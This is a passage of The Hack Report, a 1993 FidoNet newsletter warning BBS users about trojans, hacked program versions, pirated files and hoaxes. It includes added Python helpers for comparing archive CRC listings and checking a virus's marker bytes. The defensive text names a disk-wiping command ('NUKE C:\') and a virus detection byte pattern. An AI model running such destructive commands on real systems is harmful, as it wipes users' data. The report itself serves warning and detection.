  archive, or a different program altogether.  Jeff's copy of the shareware
  version was only 47480 bytes (compressed with ARJ).  He has seen the
  commercial game, and says it is "MUCH larger".  With this information, I
  consider the matter closed.  Thanks to Jeff for his help.

  Peter Hempel (1:229/15) posted a message in the FidoNet Echo VIRUS about
  the file BREAKIT!, which was described as follows:

  BREAKIT!.ZIP  6714  03-29-93  (CRS) A Gw-Basic Code And Cipher Program
                                Allowing You To Enter Ascii Characters, To
                                Save Them, And To Encode And Decode.

  Peter claims that this program erased his root directory, but says he was
  able to recover everything by booting from a write-protected system disk
  and using the Norton Utilities UNERASE command.  The archive contents are
  as follows:

   Name         Original Method     Packed CR%   Date     Time   CRC
   ============ ======== ======== ======== === ======== ======== ========
   BREAKIT!.BAS     4453 Implode      2604  58  1-24-93 11:25:24 42CA0CE4
   CODEFILE.FIL     1240 Implode       550  44  3-28-92 10:52:44 B6ADEB20
   PRINTME.BAT        31 Stored         31 100  1-24-93 11:54:12 965CF8AE
   VIEW.COM          958 Implode       876  91  3-19-92 19:11:46 47C5E5EF
   README.BAT         30 Stored         30 100  1-24-93 11:52:32 95294A43
   BRK.BAT            40 Stored         40 100  1-24-93 11:53:32 FC9F3B2E
   BREAKIT!.DOC     2679 Implode      1440  54  1-24-93 11:56:06 EC302AFA
   ============ ======== ======== ======== === ======== ======== ========
          7         9431 ZIP          5571  59  1-24-93 11:56:06

  He did not say which file did the damage.  I do not know if this is a
  Trojan or an infected file - in either case, it may well be an isolated
  incident.  Test results would be greatly appreciated.
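
  A SysOp who finds a similarly named archive on their board can check
  whether it is the one reported by comparing each member's name, size and
  CRC-32 with a listing like the one above.  The Python below is an added
  example, not part of The Hack Report: the function names and the sample
  archive are constructed for illustration, and only the listing values
  are taken from Peter's report.

```python
import io
import re
import zipfile
import zlib

# Rows copied from the BREAKIT! listing in the report (the page's own values).
REPORTED_LISTING = """\
 Name         Original Method     Packed CR%   Date     Time   CRC
 ============ ======== ======== ======== === ======== ======== ========
 BREAKIT!.BAS     4453 Implode      2604  58  1-24-93 11:25:24 42CA0CE4
 CODEFILE.FIL     1240 Implode       550  44  3-28-92 10:52:44 B6ADEB20
 PRINTME.BAT        31 Stored         31 100  1-24-93 11:54:12 965CF8AE
 VIEW.COM          958 Implode       876  91  3-19-92 19:11:46 47C5E5EF
 README.BAT         30 Stored         30 100  1-24-93 11:52:32 95294A43
 BRK.BAT            40 Stored         40 100  1-24-93 11:53:32 FC9F3B2E
 BREAKIT!.DOC     2679 Implode      1440  54  1-24-93 11:56:06 EC302AFA
 ============ ======== ======== ======== === ======== ======== ========
        7         9431 ZIP          5571  59  1-24-93 11:56:06
"""

# Columns: name, original size, method, packed size, ratio, date, time, CRC-32.
# Header, rule and total lines lack one of these fields and do not match.
ROW = re.compile(
    r"^\s*(?P<name>\S+)\s+(?P<size>\d+)\s+\S+\s+\d+\s+\d+\s+"
    r"\d{1,2}-\d{1,2}-\d{2}\s+\d{2}:\d{2}:\d{2}\s+(?P<crc>[0-9A-Fa-f]{8})\s*$"
)


def parse_listing(text):
    """Return {NAME: (original_size, crc32)} for every member row."""
    entries = {}
    for line in text.splitlines():
        m = ROW.match(line)
        if m:
            entries[m["name"].upper()] = (int(m["size"]), int(m["crc"], 16))
    return entries


def compare(zip_bytes, reported):
    """Compare a ZIP's directory with a reported listing.

    Returns {NAME: status}: 'match', 'differs' (size or CRC-32 disagrees),
    'missing' (reported but absent) or 'extra' (present but not reported).
    Only the central directory is read, so nothing is unpacked or executed,
    and members stored with methods Python cannot unpack (such as Implode)
    are still covered.
    """
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        actual = {
            info.filename.rsplit("/", 1)[-1].upper(): (info.file_size, info.CRC)
            for info in zf.infolist()
            if not info.is_dir()
        }
    statuses = {}
    for name, expected in reported.items():
        if name not in actual:
            statuses[name] = "missing"
        elif actual[name] == expected:
            statuses[name] = "match"
        else:
            statuses[name] = "differs"
    for name in actual:
        statuses.setdefault(name, "extra")
    return statuses


# Constructed sample archive: README.BAT has the reported size (30 bytes) but
# different content, and NOTE.TXT does not appear in the report at all.
SAMPLE_MEMBERS = {
    "README.BAT": b"REM constructed sample file \r\n",
    "NOTE.TXT": b"constructed member that the report does not list\r\n",
}


def make_sample_zip():
    """Build the constructed sample archive in memory."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        for name, data in SAMPLE_MEMBERS.items():
            zf.writestr(name, data)
    return buf.getvalue()


if __name__ == "__main__":
    reported = parse_listing(REPORTED_LISTING)
    for name, status in sorted(compare(make_sample_zip(), reported).items()):
        print(f"{name:<14} {status}")
```

  A full set of matches means the archive is very likely the reported one.
  CRC-32 is an error-detection code, not a tamper-proof signature, so a
  match says nothing about whether the contents are safe to run.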

  Lowell Shatraw (1:315/6) states that there may be two pirated commercial
  fax programs floating around under the filenames FAX and PC_FAX.  The
  archives he reported on were in ARJ format and were 447,693 and 101,089
  bytes long, respectively.  The file dates were Dec. 4, 1992, and May 26,
  1992 - no way to tell if the BBS "touched" the filedates.  Lowell is also
  not sure which commercial products these may be.  If you happen to run
  across one or both of these, please look inside them - if they are
  commercial, please let me know (after you delete your copies, of course!
  <g>).

  A message from Tony Lim (1:120/314, forwarded by Jack Cross, 1:3805/13)
  states that he had a user upload a file called TAG-NFO, which turned out
  to be a Trojan.  No details about the Trojan were given, so any
  confirmation of this would be appreciated.

  HW Bill Lambdin forwards a message from Mario Giordani in the ILink Virus
  Conference about two files.  The archives, called PHOTON and NUKE, are
  possibly droppers, containing a file called NUKE.COM which "will trash
  your HD."

  Pat Finnerty (1:3627/107) sent a reply to the last report of this,
  stating that he has a copy of a PC Magazine utility called NUKE.COM,
  which is used to remove subdirectories which contain "nested subs,
  hidden, read-only (you name it)."  He says that the command NUKE C:\ will
  effectively delete everything on a hard drive, with no chance of repair.
  This is merely the way the program is designed.

  I do not know if this is what happened in Mario's case, or if Mario
  actually found a copy (read: isolated incident) which was infected. Bill
  has asked Mario for further information, and I would like to echo his
  call for help.  If you know of this, please lend a hand.

  Ned Allison (1:203/1102) forwarded a report into the FidoNet DIRTY_DOZEN
  echo from a user of The Mailbox BBS in Cleveland (216/671-7534) named
  Rich Bongiovanni.  Rich reports that there is a file floating around
  called DEMON WARS (archive name DMNWAR52) that is "infected with a
  virus."  If true, this may be an isolated incident.  I would appreciate
  confirmation on this.

  Greg Walters (1:270/612) reports a possible isolated incident of a
  problem with #1KEEN7.  When he ran the installation, he began seeing on
  his monitor "what looked like an X-rated GIF."  The file apparently
  scanned clean.  Any information on similar sightings would be
  appreciated.

  A report from Todd Clayton (1:259/210) concerns a program called
  ROBO.EXE, which he says apparently claims to "make RoboBoard run 300%
  faster."  He says he has heard that the program fools around with your
  File Allocation Table.  I have not heard any other reports of this, so I
  would appreciate some confirmation from someone else who has seen similar
  reports.

  Kelvin Lawson (2:258/71) posted a message in the SHAREWRE echo about a
  possible hack of FEBBS called F192HACK.  I have not seen this file, nor
  has the author of FEBBS, Patrik Sjoberg (2:205/208).  He forwards the
  file sizes in the archive, reported here:

        Name          Length      Mod Date  Time     CRC
        ============  ========    ========= ======== ========
        FEBBS.EXE       220841    09 Mar 92 21:17:00 96D2E08D
        014734.TXT        1403    26 Aug 92 01:59:18 3B9F717F
        ============  ========    ========= ======== ========
        *total     2    222244    26 Aug 92 01:59:24

  Kelvin says the .TXT file is just an advert for a BBS, so it is "not
  relevant!".  As I said, the author of FEBBS has never seen this file, so
  I've asked Kelvin to forward a copy of it to him.

  Andrew Owens (3:690/333.11) forwarded a report of a "Maximus BBS
  Optimiser," going under the filenames MAX-XD and MAXXD20. Scott Dudley,
  the author of Maximus, says he did not write any programs that have these
  names, but he does not know whether they are or are not legitimate third
  party utilities.  I have requested further information from Andrew on
  this topic, and would appreciate anyone else's information, if they have
  any.

  Yet another short warning comes from David Bell (1:280/315), posted in
  the FidoNet SHAREWRE echo, about a file called PCPLSTD2.  All he says is
  that it is a Trojan, and that he got his information from another
  "billboard" and is merely passing it on.  Again, please help if you know
  what is going on here.

  A message in the FidoNet ASIAN_LINK echo from Choon Hwee (1:3603/263)
  grabbed my attention the moment I saw it: in capital letters, it said,
  "DO NOT RUN this file called MODTEXT.EXE, cause it is a TROJAN!!!".  He
  goes on to say that two BBSs have been destroyed by the file.  However,
  that's about all that was reported.  I really need more to go on before I
  can classify this as a Trojan and not just a false alarm (i.e., archive
  name, what it does, etc.).  Please advise.

| Greg Mills (1:16/390) posted a question to Robert Jung in the ARJ Support
| Echo (FidoNet) about a version of ARJ called 2.33.  It was unclear as to
| whether or not Mr.  Mills had seen the file.  Mr. Jung has stated that
| this is not a legitimate release number.  It is possible that the
| references Greg saw about 2.33 were typos, but you never know.  Please
| help your Hack Squad out on this one - if you see it, report it.

  =========================================================================

                           The Meier/Morlan List

| Here is the current status of the files contained in the Meier/Morlan
| List.  This is the last month for requests for information on this part
| of The Hack Report, as I have placed a deadline of September 30th on the
| files in this list.  They've been reported for quite some while now, and
| the verifications have slowed to a trickle.  If the files listed below
| can't be verified in time for the October issue, I will need to write
| them off as false alarms.

            === Previous comments on the files in the list: ===

  Shane Paul of Softdisk Publishing (RIME, via HW Richard Steiner),
  comments on the SLORDAX game:

    "If the SLORDAX game is by Gamer's Edge and copyrighted by Softdisk
     then it is a pirated copy."

  I can't be sure that this is the case, so the file stays on the list
  until someone can verify this.

  Lee Madajczyk (1:280/5) surmises that HARRIER could be Harrier Combat
  Simulator by Mindscape, Inc.  He says that he hasn't seen anything from
  them in quite a while, and doesn't know if the company is still in
  business.

  Here are the remaining unresolved reports from HW Emanuel Levy:

  "387DX  - sounds like a Math Co-Processor emulator - might be legit

  "Barkeep sounds like it may be a version of Tapper. If you send beer mugs
  down the screen to patrons and then have to pick up the returning mugs
  and they leave tips, then it is Tapper. Or it may be an OLD game
  published in Compute Mag. If it is the one from Compute only those who
  have the Compute issue with the game in it are allowed to have a copy.

  "Harrier is either Harrier Jump Jet or Space Harrier from Sega which came
  out for the Commodore 64 in 89 so I would assume it came out for IBM
  around then too.

  "Gremlins- There was a Gremlins Text Adventure and a Video Game for the
  computer. The video game was put out by Atari."

  Thanks, Emanuel.

  For those who have missed it before, here is what is left of the list of
  files forwarded by Joe Morlan (1:125/28), as compiled by Wes Meier, SysOp
  of the WCBBS (1-510-937-0156) and author of the AUNTIE BBS system.  Joe
  says Wes keeps a bulletin of all rejected files uploaded to him and the
  reasons they were rejected.  Joe also says he cannot confirm or deny the
  status of any of the files on the list.

  There are some that I am not familiar with or cannot confirm.  These are
  listed below, along with the description from Wes Meier's list.

  Due to the unconfirmed nature of the files below, the filenames are not
  included in the HACK????.COL and HACK????.IDX files that are a part of
  the archive of The Hack Report.  I would appreciate any help that
  anyone can offer in verifying the status of these files.  Until I receive
  verification on them, I will not count them as either hacks or pirated
  files.  Remember - innocent until proven guilty.

  My thanks go to Joe and Wes for their help.

        Filename  Reason for Rejection
        ========  =============================================
        BARKEEP   Too old, no docs and copyrighted with no copy
                  permission.
        HARRIER   Copyrighted.  No permission to copy granted.
        SLORGAME  Copyrighted.  No docs.  No permission to copy
                  granted.
        NOVELL    Copyrighted material with no permission to
                  BBS distribute
        DRUMS     I have no idea if these are legit or not.  No
                  docs.
        GREMLINS  No documentation or permission to copy given.
        CLOUDKM   A hacked commercial program.
        MENACE    Copyrighted.  No docs.  No permission to copy
                  granted.
        SNOOPY    Copyrighted.  No docs.  No permission to
                  copy granted.
        SLORDAX   Copyrighted.  No docs.  No permission to
                  copy granted.
        ESCAPE    Copyrighted.  No docs.  No permission to
                  copy granted.
        BANNER    Copyrighted.  No docs.  No permission to
                  copy granted.
        387DX     Copyrighted.  No docs or permission to
                  copy granted.
        WINDRV    Copyrighted.  No permission to copy granted.

  =========================================================================

                                  Help!!!

  Would the person who sent the copy of Vegas Casino 2 (filename VEGAS2) to
  The Hack Squad for testing/verification please re-identify themselves via
  NetMail?  Somehow, your message went to the great Bit Bucket in the sky.
  Thanks in advance!

  =========================================================================

                         Clarifications and Thanks

  Folks, the LHA mystery has finally been resolved, thanks to Scott Fell
  (1:124/6119), Steve Quarrella (1:124/9005), and Kenjirou Okubo, the
  support person for LHA.  Your Hack Squad finally received the Internet
  address for Kenjirou Okubo (kenjirou@mathdent.im.uec.ac.jp), and managed
  to verify Scott Fell's own contact, relayed via Steve.

  If you recall, Onno Tesink (2:283/318) found a file called LHA255B.  This
  claims to be version 2.55b of the LHA archiver, with a file date in the
  executable of 12/08/92.  Onno's report was the one that started the
  search.

  Kenjirou knew of this version and verified its legitimacy.  He also
  provided some other very helpful information, which is best relayed by
  quoting his message to me:

       "For DOS, currently lha256a1 is under testing in a closed
       circle for networking environment. After LHA213, dos5 appeared
       in Japan and Yoshi started his series LHA25x series. The two
       versions you mentioned seem to fall under this series. The
       latest version which might be distributed by me is LHA254 for
       people who wants to test -lh6- algorithm."

  He went on to provide the following information on how to verify your
  copy of LHA:

       "Any version ending with LHA25xb is a beta test version, and
       LHA25xa is for a limited circulation. To test whether these
       files are legitimate release either from Yoshi or me, please
       use -t option to check two dimensional CRC self-validation
       check. We believe our test will check the validation with
       10E-38 % of error probability."

  From my own testing, here is the best way to run the verification:

    1.  Extract LHA.EXE from the suspect archive and place it in an
        empty subdirectory that is not on your path.  (example:
        c:\foo\lha.exe).

    2.  Change directories to the one which contains a known good copy
        of LHA.EXE.

    3.  Execute the command LHA t drive:\path\LHA.EXE.  Using the above
        example, your command line would look like this:

                C:\LHADIR>LHA t C:\FOO\LHA.EXE

  This will execute the known good copy of LHA, which will test the suspect
  copy and report whether or not the file "appears" to be the original.
  Even though the older LHA is doing the testing, it will be able to
  verify the newer copy.

  Please note that Scott Fell's information was that the author does not
  want these copies distributed.  However, it seems that the folks working
  on LHA are aware that some betas have "escaped" into circulation.  In
  other words, use any betas _entirely_ at your own risk.

  Scott and Steve have my undying gratitude for helping to lay this to
  rest, most notably by locating Kenjirou's Internet address and following
  through on it.  Thanks from all of us!

  *************************************************************************

                                Conclusion

  If you see one of the listed files on a board near you, it would be a
  very friendly gesture to let the SysOp know.  Remember, in the case of
  pirated files, they can get in just as much trouble as the fiend who
  uploads pirated files, so help them out if you can.

                          ***HACK SQUAD POLICY***

  The intent of this report is to help SysOps and Users to identify
  fraudulent files.  To this extent, I give credit to the reporter of a
  confirmed hack.  On this same note, I do _not_ intend to "go after" any
  BBS SysOps who have these programs posted for d/l.  The Shareware World
  operates best when everyone works together, so it would be
  counter-productive to "rat" on anyone who has such a file on their board.
  Like I said, my intent is to help, not harm.  SysOps are strongly
  encouraged to read this report and remove all files listed as "confirmed"
  from their boards.  I can not and will not take any "enforcement action"
  on this, but you never know who else may be calling your board.  Pirated
  commercial software posted for d/l can get you into _deeply_ serious
  trouble with certain authorities.

  Updates of programs listed in this report need verification.  It is
  unfortunate that anyone who downloads a file must be paranoid about its
  legitimacy.  Call me a crusader, but I'd really like to see the day that
  this is no longer true.  Until then, if you _know_ of a new official
  version of a program listed here, please help me verify it.

  By the same token, hacks need to be verified, too.  I won't be held
  responsible for falsely accusing the real thing of being a fraud.  So,
  innocent until proven guilty, but unofficial until verified.

  Upcoming official releases will not be included or announced in this
  report.  It is this Moderator's personal opinion that the hype
  surrounding a pending release leads to hacks and Trojans, which is
  exactly the opposite of what I'm trying to accomplish here.

  If you know of any other programs that are hacks, bogus, jokes, hoaxes,
  etc., please let me know.  Thanks for helping to keep shareware clean!

                   Lee Jackson, Author, The Hack Report
     Moderator, FidoNet Int'l Echos SHAREWRE and WARNINGS (1:124/4007)

The Hack Report Volume 2, Number 4 (April 4, 1993)

  =========================================================================
                                    ||
  From the files of The Hack Squad: ||  by Lee Jackson, Co-Moderator,
                                    ||  FidoNet International Echo SHAREWRE
          The Hack Report           ||  Volume 2, Number 4
          for April, 1993           ||  Report Date: April 4, 1993
                                    ||
  =========================================================================

  Welcome to the fourth 1993 issue of The Hack Report.  This is a series of
  reports that aim to help all users of files found on BBSs avoid
  fraudulent programs, and is presented as a free public service by the
  FidoNet International Shareware Echo and the author of the report, Lee
  Jackson (FidoNet 1:382/95).

  This month's issue was delayed a bit, due to some severe weather in the
  area of Hack Central Station.  However, and I hope you'll agree with me,
  the wait was worth it:  more ARJ hacks have appeared, seemingly in
  anticipation of a new release of the popular archiver, and the Power Pump
  is sighted once again.  Also, in what seems to be a never-ending attack
  against a well-known program, someone has released yet another tampered
  archive of TheDraw.  Thanks to everyone who has helped put this report
  together, and to those that have sent in comments and suggestions.

  NOTE TO SYSOPS: The Hack Report may be freely posted as a bulletin on
  your BBS, subject to these conditions:

             1) the latest version is used,
             2) it is posted in its entirety, and
             3) it is not altered in any way.

  NOTE TO OTHER READERS: The Hack Report (file version) may be freely
  uploaded to any BBS, subject to the above conditions, and only if you do
  not change the filename.  You may convert the archive type as you wish,
  but please leave the filename in its original HACK????.* format.  The
  Hack Report may also be cross-posted in other networks (with the
  permission of the other network) as long as it meets the above conditions
  and you give appropriate credit to the FidoNet International Shareware
  Echo (and the author <g>).

  The idea is to make this information available freely.  However, please
  don't cut out the disclaimers and other information if you use it, or
  confuse the issue by spreading the file under different names.  Thanks!

  DISCLAIMER: The listings of Official Versions are not a guarantee of the
  files' safety or fitness for use.  Someone out there might just be
  sick-minded enough to upload a Trojan with an "official" file name, so
  >scan everything you download<!!!  The author of this report will not be
  responsible for any damage to any system caused by the programs listed as
  Official Versions, or by anything using the name of an Official Version.

| In addition, the releases listed as the latest Official Versions may not
| be entirely accurate.  However, they do reflect the latest version known
| to the author of The Hack Report at the time of writing.  That's the
| nature of the beast we call shareware:  authors have every right (and in
| this writer's opinion, are well advised) to release a new version without
| advance notice of any kind.  If you see a version newer than one listed
| here, please contact one of The HackWatchers or myself so that we can
| keep these listings up to date.

  *************************************************************************

                              Hacked Programs

| Here are the latest known versions of some programs known to have hacked
| copies floating around.  Archive names are listed when known, along with
| the person who reported the fraud (thanks from us all!).

   Program              Hack(s)                    Latest Official Version
   =======              =======                    =======================
|  ARJ Archiver         ARJ250                     ARJ239D
      Reported By:  Tommy Vielkanowitz (1:151/2305)
|                       ARJ239E
|     Reported By:  The Hack Squad
                        ARJ240A
      Reported By:  Ryan Shaw (1:152/38)

   Blue Wave Offline    BWAVE_3                    BWAVE212
    Mail Reader
      Reported By: HW Scott Raymond

   BNU FOSSIL Driver    BNU202                     BNU170
      Reported By: Amauty Lambrecht (2:291/712)    (not counting betas)
                        BNU188B
      Reported By: David Nugent (3:632/348),
                      Author of BNU

   DMS Amiga Disk       DMS version 1.12           DMS version 1.11
    Masher
      Reported By: Ben Filips, via Jay Ruyle (1:377/31)

   F-Prot Virus Scanner FP-205B                    FP-207
      Reported By: HW Bill Lambdin

   LhA Amiga Archiver   LHA148E                    LHA138E (Shareware)
      Reported By: Michael Arends (1:343/54)       LHA v1.50r (Regist.)
                        LHA151
      Reported By: Lawrence Chen (1:134/3002)

   MusicPlay            MPLAY31                    MPLAY25B
      Reported By: Lee Madajczyk (1:280/5)

   PKLite               PKLTE201                   PKL115
      Reported By: Wen-Chung Wu (1:102/342)

   PKZip                PKZ301                     PKZ204G
      Reported By: Mark Dudley (1:3612/601)
                   Jon Grimes (1:104/332)

   Shez                 SHEZ72A                    SHEZ89
                        SHEZ73
      Reported By: HW Bill Lambdin

|  Telemate             TM40C                      TM400-1 through 4
|     Reported By: Philip Dynes, RIME Telemate
|                  conference, via HW Richard
|                  Steiner
|                       TM410-1
|     Reported By: Bat Lang (1:382/91)

|  Telix                Telix v3.20                TLX321-1
|                        (Prior to Dec. 1992)      TLX321-2
|                       Telix v3.25                TLX321-3
|     Reported By: Brian C. Blad (1:114/107)       TLX321-4
                   Peter Kirn (WildNet, via HW Ken Whiton)
                        Telix v4.00
                        Telix v4.15
      Reported By: Barry Bryan (1:370/70)
                        Telix v4.25
      Reported By: Daniel Zuck (2:247/30, via Chris
                    Lueders (2:241/5306.1))
                        MegaTelix
      Verified By: Jeff Woods, deltaComm, Inc.
                        Telix Pro
      Reported By: Jason Engebretson (1:114/36),
                   in the FidoNet TELIX echo

   Wolfenstein-3D       WOLF2-1                    #1WOLF14
                        WOLF2-2
      Reported By: Wen-Chung Wu (1:102/342)

  =========================================================================

                                Hoax Alert:

| Recently, an archive of Frisk's (a.k.a. Fridrik Skulason's) F-Prot Virus
| Scanner v2.07 has been distributed with a "registration form" from a
| company called JLT.  According to Frisk, this is not legitimate.  He says
| that JLT contacted him in the fall of 1992, asking if they could
| distribute F-Prot, collect registration fees, and forward 50% of the fees
| to him.  Frisk didn't want them to do this, but it appears that an
| archive with the "registration form" may have slipped into distribution.
| In Frisk's words, "...this version is most certainly not something that I
| want distributed."

  From the "Not Really A Program, but Interesting Anyway" department, a
  "press release" has entered distribution, claiming that PKWare Inc. has
  filed for Chapter 11 bankruptcy.  The letter is dated Friday, February
  26, 1993, and supposedly quotes Mark Gresbach of PKWare in the statement.

  However, in a message posted in the CompuServe PKWARE forum on March 1,
  1993, PKWare employee Douglas Hay states that this is not true.  Douglas
  also points out that the perpetrator of the hoax misspelled the word
  Milwaukee (as 'Milwaukie'), and that one of the three phone numbers in
  the message for PKWare is wrong.  In short, ignore the letter - PKWare
  has _not_ filed bankruptcy.

  Other previously reported hoaxes:

  Filename      Claimed use/Actual activity/Reporter(s)
  ============  ==========================================================
  PKZ305        Hacked "new version" of PKZip.  However, a message in wide
                circulation claimed this was infected with a virus called
                PROTO-T.  This message is the actual hoax:  there may be
                one or more PROTO-T viruses around now, but none do what
                was claimed in the hoax message.  This hack, PKZ305, was
                not infected with any virus, nor did it contain Trojan
                code, per testing by Bill Logan (1:300/22), HW Jeff White,
                and HW Bill Lambdin.

  RAOPT         "Optimizes" your RemoteAccess BBS files and claims to be
                from Continental Software.  Actually does nothing but read
                your USERS.BBS file and report the number of users.  The
                program is _not_ from Continental Software, according to
                Andrew Milner.  Reported by Kai Sundren (2:201/150), via
                HW Mikael Winterkvist.

  SCORCHV2      Claims to be v2.0 of the game Scorched Earth:  this version
                doesn't yet exist.  Actually a renamed archive of version
                1.2.  Reported by Brian Dhatt (1:3648/2.5).

  =========================================================================

                              The Trojan Wars

  The "multitude" of Trojans that usually passes through the gates here at
  Hack Central Station was a bit smaller than in some months.  However, the
  ones that did come through were enough to make life interesting.  So,
  grab some loaves and fishes, just in case, and read on.

| Ryan Tucker (1:290/10) forwards a message from a fellow SysOp, Robert
| Pedersen, about ASM2PAS.  This claims to create Pascal source code from
| an .EXE file.  However, from text inside the executable, it appears that
| this program tries to delete your DOS directory.  It also brags about a
| certain anti-viral scanner not being able to detect it.
|
| Valid point, that:  practically _no_ anti-viral tools detect Trojans,
| with the exception of Frisk's F-Prot and one or two others.  Even then,
| the Trojan detection is not complete.  Your best protection against
| Trojans is a religiously maintained set of backups, preferably done after
| a check for viruses on your hard drive(s).

| HW Richard Steiner forwarded a message from the America OnLine GEOWORKS
| forum about the file GEOCOMM.  The message, from "GW Steve" (a "GeoRep",
| according to Richard), came from a user of GeoComm named J. S. James, and
| warned that this archive contains a hacked version of the original
| GeoComm program.  The file claims to be an "update," but it seems to be a
| Trojan which will damage your File Allocation Table (FAT).  Not a file to
| be kept around, it would seem.

| HW Bill Lambdin reports on LAW22 (no description), which contains the
| following files:
|
|      Length    Date    Time    CRC-32  Attr  Name
|      ------    ----    ----   -------- ----  ----
|       22911  02-24-93  14:13  a4b84cc7 --w-  ABOUT.COM
|       13422  02-24-93  14:44  8f0d1e96 --w-  INFO.EXE
|         126  02-24-93  14:50  68c9463a --w-  DESC.SDI
|      ------                                  -------
|       36459                                        3
|
| Bill says that ABOUT.COM contains a virus. Scan 102 labels it as BA101,
| which is a 160 byte-long .COM file infector.  This could be an isolated
| incident of an infected legitimate file, so thoroughly check any such
| file you find that has the above files in it before you kill it.
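
  One way to carry out that check, as an added example that is not part
  of The Hack Report: the Python below parses a listing in the column
  layout shown above and compares name, length and CRC-32 against the
  members of an archive you hold.  The function names, and the assumption
  that your copy is a ZIP archive, are this example's own.

```python
import io
import re
import zipfile

# Listing copied from the LAW22 report above (change bars removed).
LAW22_LISTING = """\
 22911  02-24-93  14:13  a4b84cc7 --w-  ABOUT.COM
 13422  02-24-93  14:44  8f0d1e96 --w-  INFO.EXE
   126  02-24-93  14:50  68c9463a --w-  DESC.SDI
"""

# Length, date, time, CRC-32, attributes, name: the LAW22/FX2 column layout.
# Header, ruler and total lines do not fit the pattern and are skipped.
ROW = re.compile(
    r"^[|\s]*(\d+)\s+\S+\s+\S+\s+([0-9A-Fa-f]{8})\s+\S+\s+(\S+)\s*$"
)


def parse_listing(text):
    """Return {NAME: (length, crc32)} for every row that fits the layout."""
    members = {}
    for line in text.splitlines():
        match = ROW.match(line)
        if match:
            length, crc, name = match.groups()
            members[name.upper()] = (int(length), int(crc, 16))
    return members


def compare(listing_text, zip_bytes):
    """Classify each reported file against the archive's members.

    'identical' - same name, length and CRC-32 as the reported copy
    'different' - same name, other contents (possibly a clean original)
    'absent'    - no member of that name in the archive
    """
    reported = parse_listing(listing_text)
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as archive:
        held = {
            info.filename.rsplit("/", 1)[-1].upper(): (info.file_size, info.CRC)
            for info in archive.infolist()
        }
    verdicts = {}
    for name, fingerprint in reported.items():
        if name not in held:
            verdicts[name] = "absent"
        elif held[name] == fingerprint:
            verdicts[name] = "identical"
        else:
            verdicts[name] = "different"
    return verdicts


if __name__ == "__main__":
    # Constructed stand-in archive: same member name, different contents.
    sample = io.BytesIO()
    with zipfile.ZipFile(sample, "w") as z:
        z.writestr("ABOUT.COM", b"constructed sample, not a real program")
    for name, verdict in compare(LAW22_LISTING, sample.getvalue()).items():
        print(f"{name:12} {verdict}")
```

  Only a member reported as 'identical' is byte-for-byte the copy Bill
  examined; a 'different' one still needs its own virus scan.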

| Another report from Mr. Lambdin concerns a file that a user in the
| Intelec PC-Security conference sent to him, called PCS204 (PC-Sentry
| v2.04).  Bill's tests show that this copy of the archive contains two
| files, INSTALSW.COM and EVERYDAY.COM, that are infected with a
| non-resident "companion" virus that utilizes the Mutation Engine.  It
| also contains the file PCS.EXE, which is infected with a virus created by
| a virus-writing group's "Mass Produce Code Generator."

| Bill also reports that our old friend, the Power Pump virus, has
| resurfaced inside a file called FX2.  Here's the archive info:
|
|               Length   Date    Time    CRC-32  Attr  Name
|               ------   ----    ----   -------- ----  ----
|                25846 01-01-92  00:00  2635e28a --w-  FX2.EXE
|                 1199 01-01-92  00:00  f61885bd --w-  FX2.COM
|                17354 01-01-92  00:00  02eac55c --w-  POWER.EXE
|                 1007 01-01-92  00:00  139e1291 --w-  FX2.DOC
|               ------                                 -------
|                45406                                       4
|
| The giveaway here is the file POWER.EXE.  For full documentation of the
| Power Pump virus, please see the 1992 Full Archive Edition of The Hack
| Report (filename HACK92FA), available from most official distribution
| sites.

| Travis Griggs (1:3807/8) forwarded a report from a local board called The
| Forum (phone number 1-318-528-2107) by a user named Susan Pilgreen. The
| message referred to a file called BOUNCE, which she said was infected
| with the Beeper (Russian Mirror) virus.  The file, according to Travis,
| claimed to be a game.  Travis has now forwarded the file information on
| this archive:
|
|     Filename       Original DateTime modified CRC-32   Attr BTPMGVX
|     ------------ ---------- ----------------- -------- ----------
|     BOUNCE.COM         4053 80-01-01 00:02:04 35C562AF A--W B 1
|     BOUNCE.DAT       119101 92-11-20 23:16:10 247712A8 A--W B 0
|     BOUNCE.DOC          348 92-11-20 23:21:46 B28557FE A--W B 1
|     ------------ ----------
|         3 files      123502

| Geoffrey Liu (1:229/15) reports in the FidoNet WARNINGS echo on a file
| called BWE.  This claims to provide a "quick and easy way to exit
| Windows."  Geoffrey forwards this file info and disassembly report from
| John Eady (1:229/15, john.eady@canrem.com):
|
|           Name          Length   Mod Date    Time     CRC
|           ============  ======== =========  ======== ========
|           LICENSE.TXT       2656 14 Feb 93  22:01:14 46B50814
|           ORDER.TXT         2335 12 Feb 93  12:00:18 9D1A705E
|           README.TXT        3565 14 Feb 93  23:08:08 3EA7548E
|           BWE.EXE          19517 14 Feb 93  23:02:34 F1729CA4
|           ============  ======== =========  ======== ========
|           *total     4     28073 14 Feb 93  23:08:08
|
| "After debugging part of the virus, the following text appears (encrypted)
| in the infected program:
|
|       It's time for a math test curtesy of YAM!
|
|       And the question is...
|
|       What is 00 + 00 =
|
|       WRONG!!!! TRY AGAIN!
|
|       Admiral Bailey
|
| "This virus is self-encrypting, but does not use any stealth techniques
| (as far as I've seen). It doesn't appear to infect the boot record, or
| the boot partition record. It does not appear to infect .SYS files, or
| .OV? files.
|
| "If you feel you have been infected, examine any EXE or COM files that you
| believe are infected. Check the 4th and 5th bytes in a COM file for the
| characters "BA". Check the 12th and 13th bytes in an EXE file for the
| characters "BA". If you find a file like this, chances are you have been
| infected."
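
  John Eady's byte check above, written out as a small Python routine.
  This is an added example, not part of The Hack Report or of John's
  disassembly.  It assumes the message counts bytes from 1 (so "4th and
  5th" means offsets 3 and 4); the function names are this example's own.

```python
import os

MARKER = b"BA"
# Assumption: the report counts the first byte of the file as byte 1,
# so these are the matching 0-based offsets.
COM_OFFSET = 3    # "4th and 5th bytes" of a COM file
EXE_OFFSET = 11   # "12th and 13th bytes" of an EXE file


def program_kind(header):
    """DOS loads by content, not extension: an MZ (or ZM) header means EXE."""
    return "EXE" if header[:2] in (b"MZ", b"ZM") else "COM"


def has_marker(header):
    """True when the two-byte marker sits at the offset for this file type.

    A file too short to reach the offset simply does not match.
    """
    offset = EXE_OFFSET if program_kind(header) == "EXE" else COM_OFFSET
    return header[offset:offset + 2] == MARKER


def suspects(root):
    """Return sorted relative paths of .COM/.EXE files under root with the marker."""
    found = []
    for folder, _dirs, files in os.walk(root):
        for name in files:
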